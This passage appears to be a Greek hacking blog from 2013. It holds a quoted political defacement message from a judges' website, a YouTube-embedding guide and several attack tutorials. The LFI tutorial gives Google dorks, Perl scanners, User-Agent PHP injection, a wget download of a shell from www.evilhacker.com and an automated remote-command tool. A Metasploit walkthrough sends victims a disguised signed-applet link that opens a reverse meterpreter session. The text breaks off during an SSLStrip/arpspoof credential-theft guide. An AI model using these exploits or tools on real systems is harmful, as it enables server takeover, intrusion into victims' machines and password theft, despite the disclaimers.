…και μιλάω για το έργο με τις καταδίκες πολιτικών και μη , που έχουν καταχραστεί δημόσιο χρήμα.
Η κατάχρηση δημοσίου χρήματος θα έπρεπε αυτομάτως να θεωρείται ποινή ισόβιας κάθειρξης, γιατί μιλάμε για τον κόπο μιας ζωής ανθρώπων που ζούνε με ένα μεροκάμματο για 30-35 χρόνια, με την ελπίδα να ανταμοιφθούν οι κόποι τους στα γεράματα παίρνοντας μια αξιοπρεπή σύνταξη .
Όλο αυτό, το οποίο είναι απλώς ένα παράδειγμα από τα εκατοντάδες που μπορώ να σκεφτώ, το έχουν καταστρέψει φθαρμένοι και απατεώνες πολιτικοί που κάποτε πρέπει να ΠΛΗΡΩΣΟΥΝ.
Το χειρότερο από όλα στις εποχές που ζούμε πλέον, είναι πως για την νεολαία, αυτά τα υποκείμενα που θέλουν να ονομάζονται πολιτικοί, έχουν καταστρέψει την ελπίδα που είχε όλη η νεολαία και τα όνειρα που έκανε σπουδάζοντας μια ειδικότητα, με μεράκι να την εξασκίσει μόλις τελειώσει την σχολή του και την έχουν μετατρέψει σε μία άνευ προηγουμένου τρομοκρατία για το “μεροκάμματο”, για ένα κομμάτι ψωμί δηλαδή και να λες “δόξα τω Θεό” που έχουμε μια δουλίτσα και ας δουλεύουμε για ένα κομμάτι ψωμί .
Κατέστρεψαν την έννοια της οικογένειας, είτε όντας μέλος μιας οικογένειας που τα βγάζει πέρα δύσκολα (συνηθισμένο πλέον στις μέρες μας) με καθημερινούς καβγάδες,ψυχολογική κατάσταση στο ναδίρ κτλ. , είτε το να τολμήσεις, γιατί περι τόλμης πρόκειτε την σήμερον ημέρα, να σκεφτείς να δημιουργήσεις μια δική σου οικογένεια σαν νέος άνθρωπος με την υγειή ελπίδα να κάνεις κανένα παιδάκι, να το πας σχολείο, να το θαυμάσεις παίρνοντας μέρος σε ένα αθλητικό γεγονός ή παίρνοντας έναν έπαινο στο σχολείο κτλ.

ΕΧΟΥΝ ΚΑΤΑΣΤΡΕΨΕΙ ΤΙΣ ΕΠΟΜΕΝΕΣ ΓΕΝΙΕΣ – ΕΧΟΥΝ ΚΑΤΑΣΤΡΕΨΕΙ ΤΑ ΠΑΙΔΙΑ ΣΑΣ

Γι’ αυτό λοιπόν σας παρακαλούμε να μην δείξετε ίχνος οίκτου σε όλα αυτά τα λαμόγια για ότι έκαναν και συνεχίζουν ακόμα να κάνουν στην νεολαία και στους συνταξιούχους που είναι ανήμποροι να αντιδράσουν.
Μη δείξετε ίχνος οίκτου ξεκινώντας από το αρχιλαμόγιο αύριο που ξεκινάει η δίκη του Τσοχατζόπουλου .
Αν ήθελε να είναι σωστή η δικαιοσύνη στις μέρες που βιώνουμε, θα έπρεπε να τους βάλετε ΌΛΟΥΣ φυλακή, και να ξεκινήσουν ΜΕΤΑ οι δίκες για τον καθένα τους. Όποιος θα βρισκόταν αθώος, τότε θα επέστρεφε στην ελευθερία του και όποιος όχι…..Να σάπιζε στην φυλακή με δέσμευση της περιουσίας του και μέχρι 1ου βαθμού συγγένειας. Εννοείτε πως με τους ρυθμούς που οι ίδιοι έχουν επιβάλει στα δικαστήρια, ούτε λίγο -  ούτε πολύ μιλάμε για μια δικαστική διαδικασία που θα πάρει γύρα στα 100 χρόνια για να δικαστούν όλα τα λαμόγια.
Μπορεί να τα παραλέω όντας εξοργισμένος με όλα αυτά, αλλά ΕΣΕΙΣ μπορείτε να κάνετε την υποψηφιότητα στο Ελληνικό κοινοβούλιο να την διεκδικούν  αυτοί που θέλουν να δημιουργήσουν και να αφήσουν υστεροφημία καλή και όχι να την διεκδικούν βουτηρομπεμπέδες και να το έχουν ως επάγγελμα που οι περισσότεροι είναι ανεπάγγελτοι δικηγόροι με πληρωμένα πτυχία στις χώρες πρώην ανατολικού μπλόκ που ήρθαν να μας το παίξουν φωστήρες.

Πιστεύουμε σε εσάς…μην απογοητεύσετε τα παιδιά σας !

Hacked By   [P.A.O.K.]

security3Αξίζει σε αυτό το σημείο να σημειώσουμε oτι ο [P.A.O.K], υποστηρικτής της Ελληνικής Χάκινγκ Σκηνής όπως δηλώνει, έχει απασχολήσει ιδιαίτερα τα ηλεκτρονικά μέσα ενημέρωσης με πολιτικά κυρίως χτυπήματα σε στόχους υψηλού προφίλ, όπως την ιστοσελίδα του Θ. Πάγκαλου, της ΟΝΝΕΔ, του ΕΚΑΒ, του Λιμένος Θεσσαλονίκης καθώς και της Αποκεντρωμένης Διοίκησης Μακεδονίας-Θράκης αλλά και εναντίον ιστοσελίδας αξιωματικών των διωκτικών αρχών! Σε κάθε χτύπημά του ο [P.A.O.K] αναρτά μήνυμα αναφορικά με την επικαιρότητα με βολές προς όλες τις κατευθύνσεις.
Στο τελευταίο του χτύπημα, εναντίον της ιστοσελίδας των Ελλήνων Δικαστών διαπιστώνουμε ότι μέσω της κυβερνοεπίθεσης επιθυμεί να στηρίξει και να επιδοκιμάσει (σίγουρα όχι με τον προσφορότερο τρόπο λόγω των νομικών συνεπειών που ανακύπτουν από την κυβερνοεπίθεση) τις ενέργειες των δικαστών αναφορικά με τις καταδίκες πολιτικών και προσώπων που έχουν καταχραστεί δημόσιο χρήμα.
Δεν έχει αποσαφηνιστεί αν ο [P.A.O.K] κατα την διάρκεια της κυβερνοεπίθεσης άντλησε επιπλέον ευαίσθητα ή/και προσωπικά δεδομένα ή αν υπήρχαν τέτοιου είδους δεδομένα διαθέσιμα στην ιστοσελίδα (σ.σ. παρατηρούμε οτι αριστερα η ιστοσελίδα διαθέτει φόρμα για πρόσβαση με username και κωδικό πρόσβασης πιθανόν απο συμβεβλημένους δικαστικούς ή συντάκτες της ιστοσελίδας)
Θεωρούμε ότι  αρμόδια ομάδα διαχείρισης της ιστοσελίδας dikastes.gr πρέπει να προβεί ΑΜΕΣΑ σε έλεγχο της ιστοσελίδας κυρίως για την πιθανότητα διαρροής δεδομένων προσωπικού χαρακτήρα των συμβεβλημένων μελών (ονόματα ή πιθανόν e-mail επικοινωνίας δικαστικών) που πιθανόν έχουν διαρρεύσει από την κυβερνοεπίθεση. Επιπλέον θα πρέπει να διερευνηθεί και να επιδιορθωθεί ΑΜΕΣΑ η αδυναμία που χρησιμοποίησε ο hacker για να αλλοιώσει την ιστοσελίδα και να προσθέσει το μήνυμα-προκήρυξή του.


Δημοσιεύθηκε από SecNews

Κυριακή 21 Απριλίου 2013

Πως ενσωματώνω εύκολα ένα βίντεο από το youtube στο blog μας

Παρακάτω θα εξηγήσουμε πως μπορούμε εύκολα να ενσωματώσουμε ένα βίντεο από το youtube στο προσωπικό
μας blog.

Βήμα 1 -> Εύρεση βίντεο και αντιγραφή κώδικα ενσωμάτωσης

Βρίσκουμε το βίντεο που θέλουμε στο youtube και πατάμε το κουμπί “Αποστολή” και στη συνέχεια το κουμπί “Ενσωμάτωση”. Το αποτέλεσμα πρέπει να είναι παρόμοιο με το παρακάτω:

Τέλος, αντιγράφουμε ό,τι υπάρχει μέσα στο πλαίσιο (στην εικόνα φαίνεται επιλεγμένο – μπλε χρώμα).

Βήμα 2) -> Δημιουργία gadget στο blog

Πηγαίνουμε στο blog μας (έχοντας κάνει login με τα στοιχεία μας) και πατάμε το κουμπί “Σχεδίαση” πάνω δεξιά. Έπειτα, αν έχουμε την νέα διεπαφή του blogger, επιλέγουμε την “Διάταξη” στην αριστερή στήλη και στη συνέχεια πατάμε “Προσθήκη gadget” στο μέρος της σελίδας όπου θέλουμε να προσθέσουμε το βίντεο. (Αν έχουμε την παλιά διεπαφή, πατάμε κατευθείαν ”Προσθήκη gadget”)
Στο παράθυρο που εμφανίζεται βρίσκουμε το gadget με όνομα “HTML/JavaScript” και πατάμε το μπλε + στα δεξιά του. Στο νέο παράθυρο που εμφανίζεται, βάζουμε (αν θέλουμε) ένα τίτλο της αρεσκείας μας και στη συνέχεια στο άδειο πλαίσιο επικολλούμε το κομμάτι που είχαμε αντιγράψει από το youtube και πατάμε “ΑΠΟΘΗΚΕΥΣΗ”.
Επιστρέφοντας στην σχεδίαση πατάμε “ΠΡΟΕΠΙΣΚΟΠΗΣΗ” για να δούμε τι αποτέλεσμα θα έχουμε στη σελίδα του blog μας.

Βήμα 3) -> Έλεγχος/Αλλαγή μεγέθους

Με το πάτημα του κουμπιού “ΠΡΟΕΠΙΣΚΟΠΗΣΗ” πιθανότατα θα δούμε το βίντεο που ενσωματώσαμε να φαίνεται στο blog μας, αλλά όχι με τις σωστές διαστάσεις. Αυτό συμβαίνει γιατί οι διαστάσεις των τμημάτων του blog μας είναι προκαθορισμένες και είναι δύσκολο να τις αλλάξουμε. Πιο εύκολο είναι να αλλάξουμε όμως το μέγεθος του βίντεο που ενσωματώνουμε.
Γυρίζουμε στο παράθυρο της Σχεδίασης (που δεν έχει κλείσει) και πατάμε το κουμπί “Επεξεργασία” πάνω στο gadget που περιέχει το βίντεο. Στο παράθυρο που ανοίγει εντοπίζουμε τα width=”xxx” height=”xxx” (όπου xxx οι τιμές που έχουν οι 2 παράμετροι) και αλλάζουμε τις τιμές τους ανάλογα με το ποια διάσταση θέλουμε να μεταβάλλουμε.
Πατάμε “ΑΠΟΘΗΚΕΥΣΗ” και στη συνέχεια “ΠΡΟΕΠΙΣΚΟΠΗΣΗ” για να δούμε το αποτέλεσμα.
Επαναλαμβάνουμε την παραπάνω διαδικασία μέχρι το βίντεο να εμφανίζεται στο μέγεθος που επιθυμούμε.

Βήμα 4) -> Αποθήκευση αλλαγών.

Στο παράθυρο της σχεδίασης πατάμε το κουμπί “ΑΠΟΘΗΚΕΥΣΗ” ώστε να αποθηκευτούν οι αλλαγές που έχουμε κάνει. Στη συνέχεια, πατώντας το κουμπί “Προβολή ιστολογίου” μπορούμε να δούμε το blog μας όπως το βλέπουν πλέον και οι υπόλοιποι χρήστες.

LFI (Local File Inclusion)...

Γειά σας, μετά από αρκετό καιρό απουσίας γυρίσαμε και πάλι με νέα tutorials και δημοσιεύσεις. Σε αυτό το tutorial θα αναλύσουμε ένα τρόπο επίθεσης εξίσου σημαντικό για την κατάληψη ενός server. Ο τρόπος αυτό είναι παρόμοιος με την επίθεση RFI που είχαμε προαναφέρει σε παλιότερο άρθρο. Η εισαγωγή που θα κάνω για να ξεκινήσω αυτό τον τύπο επίθεσης είναι ένα πολύ σύντομο και παλιό ρητό... "Τα μεγάλα κάστρα πέφτουν από μέσα"...
Σύμφωνα με προηγούμενο άρθρο η επίθεση RFI (Remote File Inclusion) είναι ένας τύπος επίθεσης σε server όπου δηλαδή, κάποιος επιτιθέμενος μπορεί να εκτελεί κώδικα σε ένα απομακρυσμένο site μέσω ενός .php /.asp shell που “φιλοξενείται” σε δικό του server. Διαβάζοντας τον τίτλο LFI (Local File Inclusion) θα μπορούσε να πει κανείς ότι η επίθεση αυτή είναι ίδια σχεδόν με την RFI με την μόνη διαφορά ότι η επίθεση Local File Inclusion εμφανίζει αρχεία μέσα απ’ τα τον server.
Αν είχαμε ένα site που είχε πρόβλημα με τις επιθέσεις RFI η επίθεση θα γινόταν έτσι:

Ενώ ένα site ευπαθές σε LFI επιθέσεις, θα έχει την εξής σύνταξη:

http://www.site.com/index.php?page=../../../../../../../etc/passwd

Ας δούμε τι είναι μια επίθεση τύπου LFI και που οφείλετε μια τέτοια αδυναμία. Όλα αρχίζουν και τελειώνουν εδώ για τον απρόσεχτο προγραμματιστή!

<?php
$page = $_GET[page];
include ($page);
?>

Όπως μπορεί να καταλάβει ο καθένας (ή περίπου ο καθένας), αυτό είναι ένα ευπαθές κομμάτι PHP κώδικα που δεν πρέπει ΠΟΤΕ να χρησιμοποιηθεί κατά τη δημιουργία μια σελίδας. Το include() δεν ελέγχετε πουθενά και αφήνει τα δεδομένα να “περνούν” στο site χωρίς πρώτα, να φιλτραριστούν με κάποιο τρόπο!
Mια ενδιαφέρουσα ανακάλυψη -μέσω του LFI- θα ήταν το αρχείο /etc/passwd/ αφού, μέσω της επίθεσης LFI μπορούμε να διαβάσουμε αρχεία μεσα απ’ το server. Αν στη σελίδα index.php?page=news.php αντικαταστήσουμε το “news.php” με “../../../../../../../../../etc/passwd“, θα έχουμε στα χέρια μας το αρχείο “/etc/passwd/“.

Προσοχή: Μιλάμε πάντα για ένα site το οποίο είναι ευπαθές σε επίθεση LFI! Βέβαια και αυτά τα στοιχεία να πάρουμε μπορούν να χαρακτηριστούν ως άχρηστα αφού είναι κωδικοποιημένα (με x) και ο μόνος τρόπος να τα σπάσουμε είναι να αποκτήσουμε πρόσβαση στο directory “/etc/shadow” το οποίο ΠΟΤΕ δεν είναι προσβάσιμο για το ευρύ “κοινό” αφού είναι only Readable / Writeable απ’ τον root.
Κάπως έτσι άδοξα λοιπόν, θα τέλειωνε η ‘καριέρα’ ενός skript kiddie (αφού πρώτα είχε κάνει φιγούρα σε γνωστούς, φίλους, ξαδέρφια και μακρινούς συγγενείς!!). Άρα, αν φτάσουμε μέχρι εδώ και το παρατήσουμε, θα συμφωνήσω ΑΠΟΛΥΤΑ με τους επικριτές του LFI, ότι αποτελεί μια άχρηστη τεχνική.
Τι θα γινόταν αν συνδικαζόταν κάπως αλλιώς;
Τα βήματα που ακολουθούν είναι και τα ρεαλιστικά βήματα που θα ακολουθούσε κάποιος κακόβουλος hacker ώστε να πάρει την πλήρη έλεγχο ενός site.

Το Χρονικό μιας επίθεσης.

Βήμα 1


Όπως όλοι μας γνωρίζουμε, ένα απ’ τα πιο δυνατά εργαλεία στα χέρια των hackers είναι η μηχανή αναζήτησης Google αφού ουσιαστικά τους λύνει τα χέρια με μερικές πληκτρολογήσεις (το μόνο που θέλει είναι εξοικείωση πάνω στον τρόπο που θέτουμε τα ζητούμενα.Ας επιστρέψουμε στο θέμα μας, το οποίο είναι το LFI και πως θα μπορούσε κάποιος να βρει vulnerable (σε  LFI) site μέσω του google.

Γράφοντας:

inurl:index.php?page=

ή

inurl:main.php?pg=
…και τα λοιπά…
Φυσικά μπορούμε να αλλάξουμε τα δεδομένα που έχουμε θέσει προς αναζήτηση… ανάλογα με τις απαιτήσεις και τις ανάγκες μας.

Βήμα 2

Αφού βρει κάποιος ένα site το οποίο είναι ευάλωτο σε επιθέσεις LFI σίγουρα διαπίστωσε ότι το συγκεκριμένο κενό ασφαλείας δίνει την δυνατότητα να ανάγνωσης του αρχείου “/etc/passwd”. Σειρά σε κάθε επίθεση έχει η εύρεση ή η δημιουργία ενός προγράμματος αυτοματοποιημένης εκμετάλλευσης του κενού ασφαλείας που βρήκαμε. Στην περίπτωση μας θα γράψουμε μόνοι μας όλα τα προγράμματα που θα χρησιμοποιήσουμε μιας και δημιουργώντας τα προγράμματα που χειριζόμαστε κατανοούμε καλύτερα το κενό ασφάλειας που εκμεταλλευτήκαμε.

01#!/usr/bin/perl
02
03use LWP::UserAgent;
04use HTTP::Request;
05
06print "\n(c) totalXaker magazine \n";
07print "LocalFI Directory scanner [mr.pr0n]\n";
08# Eisagwgh twn dedomenwn
09print "Host: ";
10print "[Ex: www.xxx.org ]:";
11chop ($host = );
12$host = "http://".$host if ($host !~ /^http:/);
13print "Enter path:";
14print "[Ex: xxx.php?xxx= ]:";
15chop ($path = );
16{
17        $ext="../../../../../../../../../../../../../../etc/passwd";
18        $lfi=$host."/".$path.$ext;
19        print "$lfi\n\n";
20        $useragent = LWP::UserAgent->new;
21        $request=HTTP::Request->new(GET=>$lfi);
22        $scnpg = $useragent->request($request)->as_string;
23        # Elegxos gia thn le3ei pou periexei ta grammata root
24        if ($scnpg=~/root/)
25        {
26                print "Woow ",$host," is Vulnerable!\n";
27        }
28        else
29        {
30                print "PFF.. ",$host," is NOT Vulnerable!\n";
31        }
32}

Ασ’ πούμε λίγα λόγια για τον παραπάνω κώδικα! Το scriptaki όπως μπορούμε να διαπιστώσουμε, δεν κάνει κάτι το ιδιαίτερο απλά μας βγάζει απ’ τον κόπο της χειρωνακτικής εκτέλεσης του LFI test για το αν το συγκεκριμένο site (που έχουμε βάλει στο μάτι) έχει πρόβλημα τύπου LFI η όχι και συγκεκριμένα αν έχει προσβάσιμο προς το κοινό το “/etc/passwd”.Όταν βρει το /etc/passwd (αν υπάρχει!) θα ψάξει τα περιεχόμενα της σελίδας για να βρει τη λεξη root

if ($scnpg=~/root/)


Ο λόγος που βάλαμε τη λέξη root είναι απλός και σίγουρα κατανοητός. Κάθε “/etc/passwd” που σέβεται τον εαυτό του αναφέρει στην αρχή του την λέξη root. Φυσικά μπορείτε το root να το αντικαταστήσετε με home ή να το προσθέσετε και αυτό στο scannarisma για μεγαλύτερη αξιοπιστία στο αποτέλεσμα. Σε περίπτωση που μας εμφανίσει το μήνυμα “Woow http://www.site.com is Vulnerable“, τότε είμαστε σε καλό δρόμο αλλιώς. Άλλη μια παράμετρος η οποία θα μπορούσε να προστεθεί στο scanneraki μας για έλεγχο είναι το Nullbyte ():

http://www.site.com/index.php?file=../../../../../../../../ etc/passwd


Έχουν υπάρξει φορές που ενώ ζητάμε από ένα site να μας εμφανήσει το αρχείο “/etc/passwd”, εκείνο είτε δεν μας το εμφανίζει, είτε μας εμφανίζει μηνύματα λάθους όπως στο παράδειγμα :

Warning: main(/etc/passwd.inc): failed to open stream: No such file or directoryectory in /var/www/htdocs/index1.php on line 199
Warning: main(): Failed opening '/etc/passwd.inc' for inclusion (include_path='.:/usr/lib/php') in /var/www/htdocs/index1.php on line 199


Ενώ, όταν βάλουμε /etc/passwd μας εμφανίζει κανονικά /etc/passwd. Η μέθοδος αυτή λέγετε αλλιώς και Null poison attack. Κάτι τέτοιο είναι πολύ εύκολο να προστεθεί στον κώδικα μας, απλά προσθέτοντας μερικές γραμμές ακόμα. Μετά την γραμμή 29 μπορούμε να προσθέσουμε τον παρακάτω κώδικα.

Null poison Attack Code:

01print "Tryin' to LFI with NullByte ()\n";
02{
03$ext2="../../../../../../../../../../../../../../etc/passwd";
04$byte=$host."/".$path.$ext2;
05print "$byte\n\n";
06$useragent = LWP::UserAgent->new;
07$request=HTTP::Request->new(GET=>$byte);
08$scnpg = $useragent->request($request)->as_string;
09if ($scnpg=~/root/)
10{
11        print "Woow ",$host," is Vulnerable with !\n";
12}
13else
14{
15        print "PFF.. ",$host," is NOT Vulnerable AGAIN!!\n";
16}
17
18}

Στην Εικόνα βλέπουμε ένα site που με ευκολία μας δείχνει όλα του τα “ευαίσθητα” προσωπικά δεδομένα “/etc/passwd”. Καλό σημάδι για έναν εισβολέα..Κακό για τον admininstrator.

Βήμα 3ο

Στα προηγούμενα δύο βήματα ανακαλύψαμε ένα site το οποίο έχει πρόβλημα στο πως δέχεται τα δεδομένα, και αβίαστα εμφανίζει αρχεία μέσα που σε καμία περίπτωση δε θα έπρεπε να βλέπαμε. Το directory που θα χρησιμοποιήσουμε για τα παραδείγματα μας στη συνέχεια του άρθρου, δέν θα είναι το “/etc/passwd” αλλά το “/proc/self/environ/“.
Στην περίπτωση που θέλουμε να αυτοματοποιήσουμε την συγκεκριμένη διαδικασία -δηλαδή να ψάχνει για το directory “proc/self/environ”- απλα αλλάζουμε το directory που scannάραμε στο προηγούμενο βημα καθώς επίσης και το if ($scnpg=~/root/) σε if ($scnpg=~/HTTP_USER_AGENT/) και είμαστε έτοιμοι ;)
Βλέπουμε στα στοιχειά που περιέχει το “/proc/self/environ/” αναφέρει και τα στοιχεία του User Agent μας.

Mozilla/5.0 (X11; U; Linux i686; el-GR; rv:1.9.0.3) Gecko/2008092510 Iceweasel/3.0.1 (Debian-4.0.1-2)

Εδώ βλέπουμε μερικά στοιχεία που μας αποκαλύπτει το /proc/self/environ/.Στο οποίο θα προσπαθήσουμε να πάρουμε πρόσβαση.. Τώρα το πως, αποτελεί ένα αίνιγμα που θα ξετυλιχτεί λίγο-λίγο μπροστά στα μάτια σας.
Μας ήρθε μια σατανική ιδέα! Αφού δείχνει τα στοιχεία του User Agent μας σαν στοιχεία του site, θα δοκιμάσουμε, να αλλάξουμε τα στοιχεία αυτά με μια εντολή που μας δίνει για παράδειγμα τη λίστα όλων των περιεχομένων του κατάλογου όπου βρισκόμαστε! Στο linux είναι η εντολή ls.
Για να υλοποιήσουμε την σατανική μας ιδέα θα χρειαστούμε το Extension για τον FireFox με το όνομα Tamper Data.
Το tamper data εν δράση!

Βήμα 4ο

Αφού εγκατασταθεί το extencion Tamper Data το βάζουμε σε λειτουργία
Το ανοίγουμε το site μας πάμε στην καρτέλα του Tamper Data, πατάμε start Tamper Data και κάνουμε refresh το site. Οταν μας εμφανιστεί αυτό που βλέπουμε στην εικόνα 3 πατάμε “tamper” και θα μας βγάλει στο το menu το οποίο φαίνεται στην εικόνα 4 και αλλάζουμε τα στοιχεία του User Agent με την εντολη ls -la, αλλά όχι έτσι απλά. H ολοκληρωμένη μορφή της εντολής θα πρέπει να είναι η ακόλουθη:

1<? system("ls -la");?>
Αλλάζουμε τα στοιχεία του User Agent στο συγκεκριμένο πεδίο με την εντολή. Αν όλα πάνε καλά μας περιμένει μια έκπληξη.
Ο λόγος που γράφουμε έτσι την εντολή είναι απλός. Προσπαθούμε να κοροϊδέψουμε το site ώστε να πιστέψει ότι και η εντολή μας είναι μέρος του κώδικα!

Βήμα 5ο

Αφού ακολουθήσαμε πιστά τις οδηγίες του όρθρου, κάνουμε refresh! Και…boom! ΟΛΑ τα δεδομένα του συγκεκριμένου καταλόγου.

Όλα τα αρχεία που εμπεριέχονται στον συγκεκριμένο κατάλογο.. είναι ορατά σε έναν όχι και τόσο εξουσιοδοτημένο χρήστη!

Αν δεν καταλαβαίνετε τη λέει η λίστα, μπορείτε και κοιτάξετε τον πηγαίο κώδικα της σελίδας και αυτό που θα δείτε θα είναι κάπως …ετσι...

Μια πιο εύκολα αναγνώσιμη μορφή των δεδομένων της σελίδας!!

Βήμα 6ο

Αφού πήραμε μια γεύση για το τη μπορούμε να κάνουμε με το LFI, ας δούμε όμως μέχρι που μπορούμε να το φτάσουμε. Λοιπόν, ας αντικαταστήσουμε την προηγούμενη εντολή με μια λίγο διαφορετική. Αλλά βασισμένη στην ίδια λογική! Θα ανεβάσουμε σε δικο μας έναν server ένα shellakι όπως αυτά που χρησιμοποιούνται στις αντεπιθέσεις RFI.  Όταν γίνει αυτό βάζουμε το server-θυμα να το κατεβάσει στα αρχεία του με την εντολή wget!

1<?php system("wget www.evilhacker.com/shell.txt; mv shell.txt hacked.php");?>

Με την παραπάνω εντολή, αναγκάζουμε το σύστημα να κατεβάσει -μέσω του “wget”- το shell.txt και μετά με την εντολή “mv” αλλάζουμε το όνομα από shell.txt σε hacked.php.
Πάμε στη σελίδα “/hacked.php”.

Το σύστημα είναι πλέων owned :) Και χωρίς καν να ιδρώσουμε!

Βήμα 7ο

Αφού κατανοήσαμε τον τρόπο με τον οποίο λειτουργεί η συγκεκριμένη επίθεση, σειρά έχει να γράψουμε ένα αυτοματοποιημένο εργαλείο το οποίο να μας επιστρέφει shell, ώστε να μην χρειάζεται να κάνουμε όλη την προαναφερθείσα διαδικασία.

01#!/usr/bin/perl
02
03use LWP::UserAgent;
04use HTTP::Request;
05
06print "\n(c) totalXaker magazine \n";
07print "LocalFI Automatic Ownage Tool [mr.pr0n]\n";
08print "Host: ";
09print "[Ex: www.xxx.org ]:";
10chop ($host = );
11$host = "http://".$host if ($host !~ /^http:/);
12print "Enter path:";
13print "[Ex: xxx.php?xxx= ]:";
14chop ($path = );
15{
16        $ext="../../../../../../../../../../../../../../../../../../../proc/self/environ";
17        $lfi=$host."/".$path.$ext;
18        print "$lfi\n\n";
19        $useragent = LWP::UserAgent->new;
20        print ":~# ";
21        while( $cmd = )
22        {
23                chop($cmd);
24                # Allazoyme ta stoixeia tou User Agent me oti 8eloume emeis
25                $useragent->agent("data<!--?php system('$cmd');?-->data");
26                $response = $useragent->get( $lfi );
27                # Osa stoixeia emfanistikan ap thn entolh, anagrafonte sto termatiko
28                if ($response->content =~ /data(.*)data/s)
29                {
30                        print $1;
31                }
32                print ":~# ";
33        }
34}

Τα αποτελέσματα και η χρήση του προγράμματος που γράψαμε είναι εμφανέστατα εικονα...

Το μικρο μας -όχι τόσο αθώο- προγραμματάκι έχει βάλει δυνατά του να μας βγάλει ασπροπρόσωπους και τα κατάφερε μια χαρά αφού πήραμε cmd μέσα στον server-στόχο. Πόσο χειρότερα για τον Admin θα μπορούσαν να είναι τα πράγματα?

Επίλογος

Όπως θα διαπιστώσατε στις εικόνες, τα στοιχεία του site είναι καλυμμένα ως έναν αρκετά ικανοποιητικό βαθμό, ώστε να αποφευχθούν οι επιθέσεις από ανώριμα script kiddies τα οποία το μόνο που θα ενδιαφερθούν είναι να κάνουν ενα deface στο server χωρίς καν να καταλάβουν πως έγιναν όλα αυτά.
Όπως είναι φυσικό και επόμενο το shell “hacked.php” που είχα ανεβάσει, έχει σβηστεί απ’τον server καθώς επίσης δεν έχει πειραχτεί κανένα μα κανένα αρχείο. H γνώση δείχνει δύναμη.. ενώ η επίδειξη της δύναμη με σκοπό την καταστροφή δείχνει απλά την μετριότητα.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Πέμπτη 7 Μαρτίου 2013

Java Signed Applet Social Engineering Code Execution - Backtrack 5 R3


Στο tutorial που ακολουθεί θα προσπαθήσω να σας δείξω πως χρησιμοποιούμε τα Social Engineering Tools για να χτυπήσουμε ένα θύμα. Η διαδικασία είναι απλή και όλο το νόημα αυτής βασίζεται στην αποστολή URL στο θύμα μας έτσι ώστε όταν ανοίξει το URL που θα του στείλουμε να εκτεθεί το σύστημα του.

Requirement :
1. Metasploit Framework
2. Operating System(Προτείνω Linux OS ή Backtrack 5)

Βήμα προς Βήμα:
Α) Πρώτα απ' όλα ανοίγουμε ένα τερματικό πληκτρολογούμε:

Terminal: msfconsole <-|


Στη συνέχεια περιμένουμε λίγο και μας εμφανίζει msf> και πληκτρολογούμε:

use exploit/multi/browser/java_signed_applet <-| (φορτίζουμε το java_signed_applet exploit)
set payload windows/meterpreter/reverse_tcp <-| (ορίζουμε το reverse_tcp meterpreter έτσι ώστε να συνδεθούμε με το θύμα)

Β) Το επόμενο βήμα είναι να πληκτρολογήσουμε κάποιες εντολές...

Terminal: set appletname Adobe_Inc <-|
set certcn Adobe Flash Player <-|
set srvhost 192.168.8.92 <-| (η διεύθυνση τουδιακομιστή που ορίζει το exploit δηλαδή η διευθυνσή μας)
set srvport 80 <-| (επιλέγουμε τη θύρα 80 διότι είναι η κατάλληλη για τέτοιου είδους επιθέσεις μέσω social engineering tools)
set uripath videoplaylist <-| (η URL που στέλνουμε στο θύμα μας έτσι ώστε όταν την ανοίξει να εκτεθεί --> http://192.168.8.92/videoplaylist)
set lhost 192.168.8.92 <-| (η διεύθυνση μας)
set lport 443 <-| (η θύρα που χρησιμοποιούμε για να συνδεθούμε με το θύμα μας)
exploit <-| (έναρξη έκθεσης...)

Στη συνέχεια με κάποιο τρόπο πρέπει να αποστείλουμε στο θύμα μας τη διεύθυνση http://192.168.8.92/videoplaylist έτσι ώστε όταν την ανοίξει να αποκτήσουμε πρόσβαση στο σύστημά του. Μπορούμε να την αποστείλουμε με e-mail κτλ.
Όταν λοιπόν την ανοίξει αμέσως στο τερματικό μας τρέχει το σύστημα και μας λέει ότι το meterpreter session 1 opened... και έχει ανοίξει το σύστημα του και μας εμφανίζεται η καρτέλα:

Terminal: session -l <-| (για να δω τα ενεργά session)
Μετά μας βγάζει ότι έχουμε ένα session στη λίστα μας και πληκτρολογώ ξανά..
session -i <-|
Τέλος μας εμφανίζει στην οθόνη meterpreter> που σημαίνει ότι έχουμε μπει πλέον στο σύστημα του.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Τρίτη 5 Μαρτίου 2013

"Ψάρεμα" κωδικών λογαριασμών HTTPS/SSL σελίδων με SSLStrip και ARPSpoof

Γειά σας... Πριν λίγες μέρες έφτιαξα ένα tutorial για το πως ψαρεύουμε κωδικούς πρόσβασης από ένα LAN δίκτυο χρησιμοποιώντας το social engineering tool του Backtrack 5. Σήμερα σε αυτό το tutorial θα σας δείξω πώς να ψαρέψετε κωδικού πρόσβασης από σελίδες με καταλλήξεις https/ssl δηλαδή σελίδες που είναι προστατευμένες με το πρωτόκολλο SSL. Αυτή η τεχνική μπορεί να εφαρμοστεί σε ασύρματα και ενσύρματα δίκτυα. Είναι ουσιαστικά μια ΜΙΤΜ επίθεση και για να πραγματοποιηθεί πρέπει να έχουμε ένα κομβικό σημείο για παράδειγμα ένα router (ασύρματο/ενσύρματο) που να χρησιμοποιήται από πολλούς χρήστες.
Τα εργαλεία που θα χρησιμοποιηθούν είναι το SSLStrip, arpspoof και φυσικά το Backtrack 5 R3.



Αν δεν έχουμε εγκατεστημένο το SSLStrip τότε:

1) Ανοίγω ένα τερματικό και εισάγω: wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

http://zyphyto1.host56.com/sslstrip/3.jpg

2) Στη συνέχεια αποσυμπιέζω το αρχείο που κατέβασα γράφοντας: tar zxvf sslstrip-0.9.tar.gz

http://zyphyto1.host56.com/sslstrip/4.jpg

3) Ανοίγω το φάκελο που αποσυμπίεσα το αρχείο: cd sslstrip-0.9
